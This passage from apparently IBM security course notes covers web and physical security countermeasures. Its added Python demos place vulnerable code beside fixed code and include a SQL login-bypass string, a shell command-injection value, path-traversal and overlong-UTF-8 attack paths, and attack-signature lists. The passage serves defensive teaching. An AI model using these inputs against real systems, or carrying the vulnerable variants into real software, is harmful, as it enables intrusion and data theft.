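Note that the comment field is not restricted to an allow-list, because comments legitimately contain punctuation; it is output encoding, not input filtering, that neutralizes a script tag there. Validation still caps the length, which defeats most payloads that need many characters.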


Countermeasures (18 of 55) IBM ICE (Innovation Centre for Education)



• Web Application Countermeasures


– SQL Injection Countermeasures

– Command Injection Flaws Countermeasures

– Directory Traversal/Forceful Browsing Countermeasure


Figure 3-28. Countermeasures (18 of 55) DS011.0

Notes:
SQL Injection Countermeasures: Unchecked user input must never be passed into database queries. Every
user-supplied value that reaches the database should be validated and sanitized, and checked against the
expected data type. Values passed to the database should be properly quoted or, better, bound as parameters
of a prepared statement so that they are never parsed as part of the SQL text.
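The following Python is an added example (not the course's code) showing the same login check written both ways against an in-memory SQLite table of constructed users: the concatenated version can be bypassed with a quote and a comment sequence, while the parameterized version binds the values separately from the SQL text.

```python
"""Added example (not the course's code): the same login check written with
string concatenation and with a parameterized query, run against an in-memory
SQLite table of constructed users."""
import sqlite3


def setup_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    # Constructed sample rows (clear-text passwords only to keep the demo short).
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    conn.commit()
    return conn


def login_vulnerable(conn, username: str, password: str) -> bool:
    """User input is pasted into the SQL text, so quotes and comments change the query."""
    query = (f"SELECT id FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    return conn.execute(query).fetchone() is not None


def login_safe(conn, username: str, password: str) -> bool:
    """Type and length checks, then bind values as parameters: the driver keeps
    them separate from the SQL text, so they can never be parsed as SQL."""
    if not isinstance(username, str) or not isinstance(password, str):
        raise TypeError("credentials must be strings")
    if not (1 <= len(username) <= 64 and 1 <= len(password) <= 128):
        return False
    query = "SELECT id FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = setup_db()
    attacker = ("alice' --", "wrong")   # comment sequence removes the password clause
    print("vulnerable:", login_vulnerable(db, *attacker))   # True
    print("safe:      ", login_safe(db, *attacker))         # False
```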
Command Injection Flaws Countermeasures: The best way to protect systems against command injection is
to avoid invoking the shell at all. Language-specific libraries perform the same functions as many system
calls and shell commands, and they avoid most shell command problems because they do not go through
the operating system's shell interpreter. Where input must still reach a command, the data must be validated
very carefully to ensure that requests match an expected pattern.
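As an added example (not the course's code), the Python below implements one "fetch a file" request three ways: as a shell command string (injectable through `;`), as an argv list with no shell, and as a plain library call that runs no external program at all. The file name pattern and the sample file are constructed for the demo; the vulnerable variant really does run `/bin/sh`, so the injected `echo` shows up in its output.

```python
"""Added example (not the course's code): a file-fetch request implemented three
ways, from shell string (injectable) to argv list to a pure library call.  The
file name pattern and the sample file are constructed for the demo."""
import os
import re
import subprocess
import tempfile
from pathlib import Path

# Positive pattern for the only request shape we accept: a simple .txt file name.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}\.txt$")


def read_vulnerable(base: str, name: str) -> str:
    """shell=True hands the user string to /bin/sh, which honours ';', '|' and '$(...)'."""
    result = subprocess.run(f"cat {base}/{name}", shell=True,
                            capture_output=True, text=True)
    return result.stdout


def read_with_argv(base: str, name: str) -> str:
    """No shell: with an argv list the name is one argument even if it contains ';'.
    Input is still validated against the expected pattern first."""
    if not SAFE_NAME.fullmatch(name):
        raise ValueError("file name does not match the expected pattern")
    result = subprocess.run(["cat", os.path.join(base, name)],
                            capture_output=True, text=True)
    return result.stdout


def read_with_library(base: str, name: str) -> str:
    """Best: the language's own library does the work; no external program at all."""
    if not SAFE_NAME.fullmatch(name):
        raise ValueError("file name does not match the expected pattern")
    return (Path(base) / name).read_text()


def is_rejected(fn, base: str, name: str) -> bool:
    """True if fn refuses the request with ValueError."""
    try:
        fn(base, name)
        return False
    except ValueError:
        return True


def make_sample_dir() -> str:
    """Create a directory holding one constructed file for the demo."""
    base = tempfile.mkdtemp()
    Path(base, "notes.txt").write_text("hello\n")
    return base


if __name__ == "__main__":
    base = make_sample_dir()
    hostile = "notes.txt; echo INJECTED"
    print(repr(read_vulnerable(base, hostile)))          # contains 'INJECTED'
    for fn in (read_with_argv, read_with_library):
        print(fn.__name__, "rejected:", is_rejected(fn, base, hostile))
```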
Directory Traversal/Forceful Browsing Countermeasure: Web applications can leak information, and the
Web administrator's objective should be to prevent any such disclosure. Information leakage can be stopped
at the server level through strong configuration. Most of these attacks are against embedded Web servers
included as part of other products, rather than full Web servers such as Apache and IIS. Hotfixes and patches
should be applied to fix vulnerabilities that allow directory traversal. Least-privilege access policies should be
in place, so that only the Web administrator can alter information in the Web applications. The application's
programmers should design the site so that only the intended information is disclosed to the public. Error
messages should not disclose the directory structure. Separate Web document roots should be used for the
user and administrator interfaces. Where a site requires authentication, the authentication must be applied to
the entire directory and its subdirectories. Users should be prevented from directly accessing server-side files
such as ASP and XML files.
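Here is an added Python example (not the course's code) of the check a file-serving handler needs: resolve the requested path against the web root, refuse anything that escapes it (including via `..` and symlinks), block server-side file types such as `.asp` and `.xml`, and answer with generic 403/404 responses that reveal nothing about the directory layout. The web root layout and files are constructed by `make_sample_site`.

```python
"""Added example (not the course's code): resolving a requested path against the
web root so that '..' sequences, absolute paths and symlinks cannot escape it,
with generic error responses.  The web root and its files are constructed."""
import tempfile
from pathlib import Path

# Server-side files that users must never fetch directly.
BLOCKED_SUFFIXES = {".asp", ".xml", ".config", ".ini"}


def resolve_safe(webroot: str, requested: str) -> Path:
    """Return the real file for `requested`, or raise PermissionError."""
    root = Path(webroot).resolve()
    if "\x00" in requested or requested.startswith(("/", "\\")):
        raise PermissionError("absolute path or NUL byte")
    target = (root / requested).resolve()        # collapses '..' and follows symlinks
    if target != root and root not in target.parents:
        raise PermissionError("path escapes the web root")
    if target.suffix.lower() in BLOCKED_SUFFIXES:
        raise PermissionError("server-side file type")
    if target.is_dir():
        raise PermissionError("directory listing disabled")
    return target


def serve(webroot: str, requested: str):
    """Return (status, body).  Errors are generic: no directory structure is disclosed."""
    try:
        return 200, resolve_safe(webroot, requested).read_text()
    except PermissionError:
        return 403, "Forbidden"
    except FileNotFoundError:
        return 404, "Not Found"


def make_sample_site() -> str:
    """Constructed layout: <tmp>/www/index.html is public, <tmp>/secret.txt is not."""
    base = Path(tempfile.mkdtemp())
    www = base / "www"
    www.mkdir()
    (www / "index.html").write_text("<h1>public</h1>")
    (www / "web.xml").write_text("<config>db password</config>")
    (base / "secret.txt").write_text("top secret")
    return str(www)


if __name__ == "__main__":
    www = make_sample_site()
    for req in ("index.html", "../secret.txt", "web.xml", "/etc/passwd", "missing.html"):
        print(f"{req!r:20} -> {serve(www, req)}")
```

The escape check is done on the resolved path rather than by searching the string for `..`, so encoded or symlinked variants are caught the same way; percent-decoding is assumed to have happened already in the HTTP layer.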


Countermeasures (19 of 55) IBM ICE (Innovation Centre for Education)



• Web Application Countermeasures


– Cryptographic Interception Countermeasures

– Authentication Hijacking Countermeasures

– Log Tampering Countermeasures


Figure 3-29. Countermeasures (19 of 55) DS011.0

Notes:
Cryptographic Interception Countermeasures: Interception can be countered with Secure Sockets Layer
(SSL, now superseded by TLS) together with strong protection of the server's private key. These ensure that
data passing between the client and the server cannot be read in clear text if it is intercepted.
Authentication Hijacking Countermeasures: To protect against authentication hijacking, authentication
should take place over secure channels using strong authentication methods. There should be a
comprehensive definition of the allowed methods and of the actions to take on successful or unsuccessful
presentation of credentials. Instant SSL can easily be configured to encrypt the traffic between the client and
the application, including the authentication credentials. Session cookies can be configured (for example with
the Secure and HttpOnly attributes) so that they travel only over the encrypted channel and are tied to strong
authentication.
Log Tampering Countermeasures: To protect the integrity of logs, all log records must be digitally signed
and time-stamped, creating a tamper-evident audit trail that distinguishes legitimate business transactions
from attacker activity. Separate logs should be generated for system events, network firewall events and
application events.
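The log-tampering countermeasure is easy to state and worth seeing in code. The Python below is an added example (not the course's code) of an append-only application log whose records are time-stamped and chained by an HMAC: each record's tag covers its timestamp, its message and the previous record's tag, so verification pinpoints the first record that was altered, removed or reordered. Key handling is an assumption: a production system would keep the key in an HSM or use asymmetric signatures so the log server itself cannot forge records.

```python
"""Added example (not the course's code): an append-only application log whose
records are time-stamped and chained by an HMAC, so any edit, deletion or
reordering is detected on verification.  Key handling is an assumption: a real
system keeps the key in an HSM or signs with an asymmetric key so that the log
server cannot forge records itself."""
import hashlib
import hmac
import json
import time

GENESIS = "0" * 64   # "previous MAC" of the very first record


class SignedLog:
    def __init__(self, key: bytes):
        self._key = key
        self.records = []

    def _mac(self, ts: float, prev: str, msg: str) -> str:
        # The MAC covers the timestamp, the previous record's MAC and the message,
        # so a record cannot be altered, dropped or moved without breaking the chain.
        data = json.dumps([ts, prev, msg], separators=(",", ":")).encode()
        return hmac.new(self._key, data, hashlib.sha256).hexdigest()

    def append(self, msg: str, ts: float = None) -> dict:
        ts = time.time() if ts is None else ts
        prev = self.records[-1]["mac"] if self.records else GENESIS
        rec = {"ts": ts, "prev": prev, "msg": msg, "mac": self._mac(ts, prev, msg)}
        self.records.append(rec)
        return rec


def verify(key: bytes, records) -> int:
    """Return -1 if the chain is intact, else the index of the first bad record."""
    checker = SignedLog(key)
    prev = GENESIS
    for i, rec in enumerate(records):
        expected = checker._mac(rec["ts"], rec["prev"], rec["msg"])
        if rec["prev"] != prev or not hmac.compare_digest(expected, rec["mac"]):
            return i
        prev = rec["mac"]
    return -1


if __name__ == "__main__":
    key = b"constructed-demo-key"
    log = SignedLog(key)
    for msg in ("user alice logged in", "order 17 paid", "alice logged out"):
        log.append(msg)
    print("intact:", verify(key, log.records))             # -1
    edited = [dict(r) for r in log.records]
    edited[1]["msg"] = "order 17 refunded"
    print("edited record at:", verify(key, edited))        # 1
```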


Countermeasures (20 of 55) IBM ICE (Innovation Centre for Education)



• Web Application Countermeasures


– Error Message Interception Countermeasures

– Attack Obfuscation Countermeasures

– Security Management Exploits Countermeasures


Figure 3-30. Countermeasures (20 of 55) DS011.0

Notes:
Error Message Interception Countermeasures: Error messages should be generic and not rich in
information, because attackers misuse the details reflected in them. Website cloaking capabilities make
enterprise Web resources invisible to attackers and to worms scanning for vulnerabilities, significantly
reducing the likelihood of those vulnerabilities being exploited.
Attack Obfuscation Countermeasures: There should be in-depth inspection of all traffic. The inspection
engine should be set to allow, block or translate Unicode and UTF-8 encodings so that encoded attacks are
exposed. The system that performs the decoding must support advanced decoding and have the
performance to inspect every TCP stream for signs of attack.
Security Management Exploits Countermeasures: All management functions should be firewalled and
operated through dedicated management channels. Since every Web application is unique, each may require
a different set of security policies. For instance, a business-to-business extranet application may require
application attack prevention, encryption, authentication and detailed transaction logging, while an HR portal
may only require encryption and moderate logging. There is no practical limit to the number of security zones
that can be managed from a single gateway.
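The "translate Unicode and UTF-8 encoding to display possible attacks" step is the part of attack obfuscation that inspection engines get wrong most often. The Python below is an added example (not the course's code, and not any product's decoder): it percent-decodes a request path repeatedly to catch double encoding, decodes UTF-8 leniently so that overlong sequences such as `%c0%af` for `/` are both translated and flagged, and only then matches a small signature list. The signatures and sample paths are constructed for illustration.

```python
"""Added example (not the course's code): normalize a request path (repeated
percent-decoding plus lenient UTF-8 decoding that reports overlong forms)
before matching attack signatures.  Signatures and paths are constructed."""
import re
from urllib.parse import unquote_to_bytes

# Constructed signature list; a real engine has thousands and updates them.
SIGNATURES = [re.compile(p) for p in (r"\.\./", r"<script", r"cmd\.exe")]


def decode_lenient_utf8(data: bytes):
    """Decode UTF-8 the way a permissive server might: accept overlong forms
    (e.g. C0 AF for '/') but report that one was seen.  Returns (text, overlong)."""
    out, i, overlong = [], 0, False
    while i < len(data):
        b = data[i]
        if b < 0x80:
            out.append(chr(b)); i += 1; continue
        if 0xC0 <= b <= 0xDF:
            n, cp = 1, b & 0x1F
        elif 0xE0 <= b <= 0xEF:
            n, cp = 2, b & 0x0F
        elif 0xF0 <= b <= 0xF7:
            n, cp = 3, b & 0x07
        else:                                   # stray continuation or invalid lead byte
            out.append("\ufffd"); i += 1; continue
        cont = data[i + 1:i + 1 + n]
        if len(cont) < n or any(c & 0xC0 != 0x80 for c in cont):
            out.append("\ufffd"); i += 1; continue
        for c in cont:
            cp = (cp << 6) | (c & 0x3F)
        if cp < (0x80, 0x800, 0x10000)[n - 1]:  # shortest-form rule violated
            overlong = True
        out.append(chr(cp)); i += 1 + n
    return "".join(out), overlong


def normalize(path: str, max_rounds: int = 3):
    """Percent-decode until stable (catches double encoding), decoding UTF-8 leniently."""
    flags, cur = set(), path
    for _ in range(max_rounds):
        text, overlong = decode_lenient_utf8(unquote_to_bytes(cur))
        if overlong:
            flags.add("overlong-utf8")
        if text == cur:
            break
        if "%" in text:
            flags.add("double-encoding")
        cur = text
    return cur, flags


def inspect(path: str):
    """Return (normalized path, sorted flags, matched signature patterns)."""
    norm, flags = normalize(path)
    hits = [s.pattern for s in SIGNATURES if s.search(norm)]
    return norm, sorted(flags), hits


if __name__ == "__main__":
    for p in ("/scripts/..%c0%af../winnt/system32/cmd.exe",
              "/a/%252e%252e/etc/passwd", "/index.html"):
        print(p, "->", inspect(p))
```

Matching the raw request string would miss both constructed attacks: the first contains no literal `../` until the overlong byte pair is translated, and the second contains none until the second round of percent-decoding.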


Countermeasures (21 of 55) IBM ICE (Innovation Centre for Education)



• Web Application Countermeasures


– Web Services Attacks Countermeasures

– DMZ Protocol Attack Countermeasures

• Intrusion Prevention System (IPS)

• Security policy

• Auditing process

• Updated controls and procedures


Figure 3-31. Countermeasures (21 of 55) DS011.0

Notes:
Web Services Attacks Countermeasures: There should be multiple layers of protection that dynamically
enforce legitimate application usage and block all known attack paths, with or without relying on a signature
database. This combination has proven effective in blocking even unknown attacks. Standard HTTP
authentication techniques such as digest authentication and SSL client-side certificates can be used for Web
services as well. Since most Web service models are business-to-business applications, it can be easier to
restrict access to only valid users.
DMZ Protocol Attack Countermeasures: To protect against well-known exploits, apply the suitable patches
whenever they are available. Using signatures to detect and block well-known attacks can be somewhat
effective, but signatures must exist for all forms of the attack and must be continually updated. These steps
should be followed:
- Use an Intrusion Prevention System (IPS)
- Deploy a robust security policy
- Have a sound auditing policy
- Use signatures to detect and block well-known attacks
- Keep those signatures up to date


Countermeasures (22 of 55) IBM ICE (Innovation Centre for Education)



• Physical Security Countermeasures


– Physical Barrier: An organization should make sure to have at least three physical barriers for an
effective access control mechanism:

• Perimeter

• A locked door

• Computer room entrance


Figure 3-32. Countermeasures (22 of 55) DS011.0

Notes:
Physical Barrier: A physical barrier is a key aspect of access control because it prevents physical access to
computer and network systems. An effective physical barrier mechanism employs multiple physical
restrictions that must be crossed to reach the protected systems. This multiple-barrier approach ensures that
unauthorized and harmful elements are kept out. An organization should have at least three physical
barriers for an effective access control mechanism:
- Perimeter: the external entrance to the building should be equipped with burglar alarms, protected by
external walls and fencing, and covered by surveillance. Additionally, an access list identifying who has
access to the building must exist, and someone in authority must verify visitors against it.
- A locked door protecting the computer centre, with keys, ID badges, smart cards or similar credentials
required to get through it.
- The computer room entrance. This should be another locked, carefully monitored door. While the other
two barriers keep most intruders out, many people who enter the building could be posing as someone
they are not (heating technicians, representatives of the landlord, and so on). Although such pretenses
can get them past the first two barriers, they should still be stopped by the locked computer room door.


Countermeasures (23 of 55) IBM ICE (Innovation Centre for Education)



Figure 3-33. Countermeasures (23 of 55) DS011.0

Notes:
This diagram illustrates the working of the three-layer physical barrier described above: the perimeter, the
locked door to the computer centre, and the computer room entrance.


Countermeasures (24 of 55) IBM ICE (Innovation Centre for Education)



• Physical Security Countermeasures


– Mantrap: A mantrap is a high-security installation that uses an intermediate access control mechanism
• It allows only a limited number (one or two) of people to enter the facility at a time

• It also serves to physically hold an unauthorized person


Figure 3-34. Countermeasures (24 of 55) DS011.0

Notes:
Mantrap: A mantrap is a high-security installation that uses an intermediate access control mechanism and
demands visual identification and authentication before allowing access. It admits only a limited number
(one or two) of people into the facility at a time, which makes it hard for a malicious person to slip in. It also
serves to physically hold an unauthorized, potentially malicious person until authorities reach the facility. An
illustration of a mantrap is shown in Figure 3-35. A security guard at the entry can carry out the identity
verification. To build a proper mantrap, high-strength doors and locks and bulletproof glass must be installed;
armed guards and video surveillance are added in high-security and military environments. Even inside the
facility, authentication should again be required before a person can access the protected area.


Countermeasures (25 of 55) IBM ICE (Innovation Centre for Education)



Figure 3-35. Countermeasures (25 of 55) DS011.0

Notes:
The diagram illustrates the working of a mantrap. A mantrap admits only a small number of people into the
organization at a time. If more people try to enter than the assigned number, the mantrap holds the extra
person between its locked doors, which can also be activated remotely. This process is shown in the figure.


Countermeasures (26 of 55) IBM ICE (Innovation Centre for Education)



• Physical Security Countermeasures


– Perimeter Security: The first line of defense for the security model of an organization
• The idea is to secure the outer periphery of the building so that no potential hostile person can gain
access to the resources present inside


Figure 3-36. Countermeasures (26 of 55) DS011.0

Notes:
Perimeter Security: The first line of defense in an organization's security model is perimeter security, which
can be either technological or physical. The idea is to secure the outer periphery of the building so that no
potentially hostile person can gain access to the resources inside.


Countermeasures (27 of 55) IBM ICE (Innovation Centre for Education)



• Physical Security Countermeasures


– Hardware Security
• Laptops are provided with a built-in security slot to which a cable lock can be attached

• A lock on the back cover should also be fitted


Figure 3-37. Countermeasures (27 of 55) DS011.0

Notes:
Hardware Security: Hardware security involves applying physical modifications to secure the system(s) and
prevent them from leaving the facility. Adding a cable lock between a laptop and a desk reduces the chance
of someone simply walking away with the machine and the valuable data on it. Laptops are provided with a
built-in security slot to which a cable lock can be attached, making them hard to remove from the premises.
For a desktop PC, a lock on the back cover should be fitted to keep the hard drive from falling into malicious
hands and to protect the internal components from damage; the lock that connects through that slot can also
be joined to a cable fixed to a desk or other solid fixture, so that the entire PC cannot be carried away.


Countermeasures (28 of 55) IBM ICE (Innovation Centre for Education)



• Physical Security Countermeasures


– Security Zone

• Areas that require restricted access can be broken down into smaller areas

• An alarm system can be installed that can communicate with security personnel


Figure 3-38. Countermeasures (28 of 55) DS011.0

Notes:
Security Zone: In a security zone of a building, each and every access is monitored and authenticated
individually. Areas that require restricted access can be broken down into smaller areas called security
zones. An alarm system can be installed that communicates with security personnel if an unauthenticated
intrusion is detected; it also tells the security personnel which security zone (which part of the building, for
example a particular floor) they should be looking at.
Separate zones are given separate burglar alarms to enhance security. In a residence, it would be normal
for the bedroom to be assigned a zone of its own, so that movement there can occur while other parts of the
house remain covered by a motion detector.


Countermeasures (29 of 55) IBM ICE (Innovation Centre for Education)



Figure 3-39. Countermeasures (29 of 55) DS011.0

Notes:
This diagram illustrates zones in place to ensure network security. The network connection provided to each
department depends on the zone in which it has been classified; different zones have different network
access rights associated with them.


Countermeasures (30 of 55) IBM ICE (Innovation Centre for Education)



• Physical Security Countermeasures


– Partitioning

• Through partitioning, one entity can be isolated from another

• This discussion will elaborate on the possibilities partitioning provides


Figure 3-40. Countermeasures (30 of 55) DS011.0

Notes:
Partitioning: Access control in a building can be enforced by appropriate partitioning. Separating the
important functional areas keeps information and property under check.
Through partitioning, one entity can be isolated from another. That entity can be physical (one room can be
shut off from another in a building) or logical (those who can access one set of data cannot access another).
This discussion elaborates on the possibilities partitioning provides.


Countermeasures (31 of 55) IBM ICE (Innovation Centre for Education)



Figure 3-41. Countermeasures (31 of 55) DS011.0

Notes:
The diagram illustrates the partitioning of the network according to the organization's plan. This scheme is
used so that the network access granted to each department can be defined and the network can be
provisioned accordingly.


Countermeasures (32 of 55) IBM ICE (Innovation Centre for Education)



• Physical Security Countermeasures


– Biometric

• Biometric systems use unique biological traits to allow access into a facility

• These systems, when integrated with security-oriented computer systems, can be used to record
access attempts


Figure 3-42. Countermeasures (32 of 55) DS011.0

Notes:
Biometric: Unique biological traits such as retina patterns, handprints and fingerprints have long been used
to distinguish and identify individuals. Biometric systems use these traits to allow access into a facility. Facial
recognition and keystroke recognition programs can also be used as part of access management systems.
When integrated with security-oriented computer systems, these systems can record the attempts made to
access the system. All the mechanisms installed to secure the premises must remain under surveillance, as
there is always a chance of individuals attempting to bypass them. Fingerprint readers in laptops have
become common, and these technologies have become cheaper with time.


Countermeasures (33 of 55) IBM ICE (Innovation Centre for Education)



• Physical Security Countermeasures


– Power System: Power and interference problems are likely to affect computer systems.

• Computer power supplies operate correctly only within a defined band of input power characteristics;
staying inside that band ensures smooth functioning


Figure 3-43. Countermeasures (33 of 55) DS011.0

Notes:
Power System: Power and interference problems are likely to affect computer systems. The AC power fed to
a computer is converted into DC, because the electronics require a steady DC voltage, and the power supply
operates correctly only within a defined band of input power characteristics (voltage, frequency and stability).
Keeping the supplied power inside that band is required for smooth functioning.


Countermeasures (34 of 55) IBM ICE (Innovation Centre for Education)



• Physical Security Countermeasures


– EMI Shielding

• Shielding protects a computer system against electromagnetic emissions that could disrupt its
operation

• A Faraday cage provides the necessary protection against external EM waves


Figure 3-44. Countermeasures (34 of 55) DS011.0

Notes:
EMI Shielding: Electromagnetic waves are present all around us. In most frequency bands they do not seem
to be a big concern, but electronic appliances do feel their presence and their functioning can be affected by
interfering signals. Shielding can be applied so that electromagnetic emissions do not disrupt the operation
of a computer system. A Faraday cage provides the necessary protection against external EM waves: an
electrically conductive wire is woven into a mesh (cage) around the computer room, and EM signals can
neither leave nor enter the cage. Electromechanical objects such as motors cause EMI that can lead to
component failure, spikes or circuit overload. To minimize the effect of EMI, all signal lines must be shielded
and grounded, and computer systems should be kept at a distance from electromechanical devices.


Countermeasures (35 of 55) IBM ICE (Innovation Centre for Education)



Figure 3-45. Countermeasures (35 of 55) DS011.0

Notes:
The diagram illustrates EMI being picked up by a data cable. This abrupt interference can damage a device.
The figure also shows the flow of the data signal; notice how abrupt the EMI becomes when the motor is
present.


Countermeasures (36 of 55) IBM ICE (Innovation Centre for Education)



• Physical Security Countermeasures


– Hot & Cold Aisles

• In a cold aisle the racks' air intakes face the aisle and draw in cold air; in a hot aisle the racks'
exhausts face the aisle and expel hot air

• Combining the two, cold air is supplied from below the cold aisle and hot air is extracted above the
hot aisle, providing constant circulation

• It is important that the hot air exhausted from one row of racks is not the intake air pulled in by the
next row, or overheating will occur


Figure 3-46. Countermeasures (36 of 55) DS011.0

Notes:
Hot & Cold Aisles: In server rooms there are often multiple rows of servers mounted in racks. The spaces
between the rows are known as aisles, and they are arranged as hot aisles and cold aisles. The racks' air
intakes face a cold aisle, from which cold air is drawn in to cool the equipment; the racks' exhausts face a hot
aisle, into which the heated air is expelled. Combining the two, cold air is supplied from below the cold aisle
and hot air is extracted above the hot aisle, providing constant circulation.
It is important that the hot air exhausted from one row of racks is not the intake air pulled in by the next row,
or overheating will occur. Air handlers must move the hot air out, while cold air, usually coming from beneath
a raised floor, is supplied as the intake air.


Countermeasures (37 of 55) IBM ICE (Innovation Centre for Education)



Figure 3-47. Countermeasures (37 of 55) DS011.0

Notes:
The figure illustrates hot and cold aisles working together to protect the equipment. The rows of racks are
lined up so that intakes face a cold aisle and exhausts face a hot aisle: cold air enters from the cold aisle,
passes through the equipment and leaves into the hot aisle, keeping the equipment at a suitable temperature.


Countermeasures (38 of 55) IBM ICE (Innovation Centre for Education)



• Physical Security Countermeasures


– Fire Suppression
• Fire extinguishers: portable units, selected by the class of fire they put out

• Other fixed systems: fire detectors and suppression systems built into the building


Figure 3-48. Countermeasures (38 of 55) DS011.0

Notes:
Fire Suppression: In computer center design, suppression of fire is an important consideration. The act of
suppressing or extinguishing a fire is known as fire suppression. Two types of fire-suppression systems are
widely used:
• Fire extinguishers: Fire extinguishers are known for their portability. Their selection and use is very
important. Fire extinguishers are classified according to the types of fire they put out, as shown in the
table.
These types can be combined to create a multi-purpose extinguisher with several capabilities in a single
bottle; A-B, B-C and ABC are the most common multi-purpose extinguishers. The "PASS" method is the
recommended way to use a fire extinguisher:
'P' stands for pull: pull the pin on the top of the extinguisher
'A' stands for aim: aim the extinguisher at the burning area (the base of the fire)
'S' stands for squeeze: squeeze the handle to release the extinguishing agent
'S' stands for sweep: sweep the extinguisher from side to side across the fire


• Other fixed systems: Fixed systems are built into the building. They are most commonly a combination
of fire detectors and fire-suppression systems. In a fixed system the detectors are triggered either by a
very fast change in temperature or by too much smoke, and the suppression system then releases either
water from sprinklers or a fire-suppressing gas. Water sprinklers use overhead nozzles and are used a
lot in modern buildings because they are inexpensive, reliable and need very little maintenance.
However, water can cause extensive damage to electrical equipment. To prevent that, gas-based
systems were introduced, first using carbon dioxide and later Halon gas; Halon was then phased out
because it damages the ozone layer, and environmentally acceptable gases such as those used in
FM-200 systems are now common. These gases stop the fire by removing one of its necessary factors:
carbon dioxide displaces the oxygen present in the room, while clean agents such as FM-200 mainly
absorb heat from the flames. Gas-based systems have two major drawbacks: they require a sealed
environment to work, so special ventilation systems that minimize air circulation when the gas is released
are usually installed, and they are very expensive. To avoid unnecessary cost they are usually installed
only in computer rooms or in other areas where water damage to the technology would be catastrophic.

Countermeasures (39 of 55) IBM ICE (Innovation Centre for Education)


IBM Power Systems

• Physical Security Countermeasures


– Natural Countermeasures: Examples of natural countermeasures include the following:

• Terminal of natural gas

• Surrounded by water on each side

• Organization situated on the waterway

• Organization surrounded by hills

© Copyright IBM Corporation 2014 49

Figure 3-49. Countermeasures (39 of 55) DS011.0

Notes:
Natural Countermeasures: After considering the intrinsic vulnerabilities, we consider the effect that natural countermeasures have on them. Examples of natural countermeasures include the following:
- A liquefied natural gas terminal that is surrounded on the land side by a storm berm has a natural countermeasure against the entry of conventional vehicles.
- A facility on a small island with only ferry access makes both access and getaway more difficult, as the ferry creates a “choke point” through which all threat actors must come and go.
- Any facility located on a waterway is accessible only by watercraft on that side.
- A facility located on a hillside cliff has very limited access from that side.


Countermeasures (40 of 55)

• Physical Security Countermeasures


– Man-Made Countermeasures

• Physical Countermeasures

• Electrical Countermeasures

• Operational Countermeasures


Figure 3-50. Countermeasures (40 of 55) DS011.0

Notes:
Man-Made Countermeasures: There are three types of countermeasures: physical, electrical and operational.
- Physical Countermeasures: This type includes doors, lighting, fences, locks, gates, signage, walls and other barriers that can be deployed. Physical countermeasures that are not maintained properly, or not employed at all, add to the vulnerability rather than reducing it. To reduce vulnerabilities, high-quality locks should be used, and care should be taken that all physical countermeasures are kept in good condition: a well-maintained 6 foot fence can be a better countermeasure than a poorly maintained 8 foot fence.
- Electrical Countermeasures: Access control systems, communication systems, alarm systems and video systems all fall into the category of electronic countermeasures. Communication systems include telephones, two-way radios, electronic signage, public address systems and so on. Visible light weaponry, long-range weaponry and electronic jamming equipment also fall into the category of electrical countermeasures. Employing electrical countermeasures reduces vulnerabilities in depth.
- Operational Countermeasures: Security staffing (patrols, posts and so on), security dogs, security policies and procedures, investigations and counter-surveillance programs fall into the category of operational countermeasures. If a security guard solution is implemented poorly, it actually adds to the existing vulnerability instead of reducing it. It is also essential for an organization to have security policies and procedures, as they help in implementing and employing security measures properly.


Countermeasures (41 of 55)

• Physical Security Countermeasures


– Insider Threat Countermeasures: Prevention is vastly preferable to detection and attempted
remediation

• Detection, Analysis and Identification of Misuse

• Desired Responses to Detected Anomalies and Misuses


Figure 3-51. Countermeasures (41 of 55) DS011.0

Notes:
Insider Threat Countermeasures: Prevention is vastly preferable to detection and attempted remediation.
Detection, Analysis and Identification of Misuse: In the absence of good prevention, it is of course desirable to detect known, defined types of misuse as well as otherwise unknown types of anomalous misuse (seemingly significant deviations from expected normal behavior). The latter type of detection could be particularly important in identifying early-warning signs of misuse. Because there are potential differences in the data that may need to be collected, the approach to detecting misuse may differ among the different types of misuse, depending on the relative roles of insiders and insider misuse. If insiders can exist only within local confines, it may be unnecessary to collect packets and other network data, which themselves constitute potential security and privacy risks. If privileged logical insiders are also able to access their systems remotely, and are then in some sense distinguishable from outsiders, at least geographically or by their external Internet presence, then networking data may also be relevant. Clearly, the presence of strong authentication has an impact on carrying out insider misuse detection.
Desired Responses to Detected Anomalies and Misuses: In some cases of outsider attacks, it is more important to stave off the attacks than to let them continue. In other cases, it may be appropriate to let the attacks continue but to somehow confine their effects; the same holds for insiders. In some cases of insider misuse, it may be particularly important to detect the misuse, allow it to continue, and monitor it carefully, without giving away the fact that detailed surveillance is being done.
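The two kinds of detection described above (known, defined misuse versus deviation from expected normal behavior) can be shown side by side on a small audit log. The following is an added example written for this notebook, not code from the IBM course material: the log lines, user names, baseline profile and thresholds are all constructed for illustration.

```python
# Added example (not from the IBM course material): a minimal insider-misuse
# detector that combines signature detection of known, defined misuse with
# anomaly detection of deviation from each user's expected baseline.
# Log lines, user names, baseline and thresholds are constructed.
import re
from collections import defaultdict

# Constructed audit-log sample: timestamp, user, action, object.
AUDIT_LOG = """\
2015-03-02T09:01:12 alice READ /hr/payroll/2015-02.xlsx
2015-03-02T09:03:40 alice READ /hr/payroll/2015-03.xlsx
2015-03-02T09:10:05 bob READ /eng/design/spec.docx
2015-03-02T23:14:51 bob COPY /hr/payroll/2015-03.xlsx
2015-03-02T23:15:02 bob COPY /hr/payroll/2015-02.xlsx
2015-03-02T23:15:30 bob COPY /hr/salaries/exec.xlsx
2015-03-02T23:16:01 bob DELETE /var/log/audit/audit.log
2015-03-02T10:30:00 carol READ /eng/design/spec.docx
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+)$")

# Known, defined misuse: signature rules keyed by a short rule name.
SIGNATURES = {
    "audit-log-tamper": lambda e: e["action"] == "DELETE"
                                  and e["obj"].startswith("/var/log/audit/"),
}

# Expected normal behaviour per user (constructed baseline): the directory
# prefixes each user normally touches and their normal working hours.
BASELINE = {
    "alice": {"prefixes": ("/hr/",), "hours": range(8, 19)},
    "bob":   {"prefixes": ("/eng/",), "hours": range(8, 19)},
    "carol": {"prefixes": ("/eng/",), "hours": range(8, 19)},
}

def parse(log_text):
    """Parse the audit log into event dicts; malformed lines are skipped."""
    events = []
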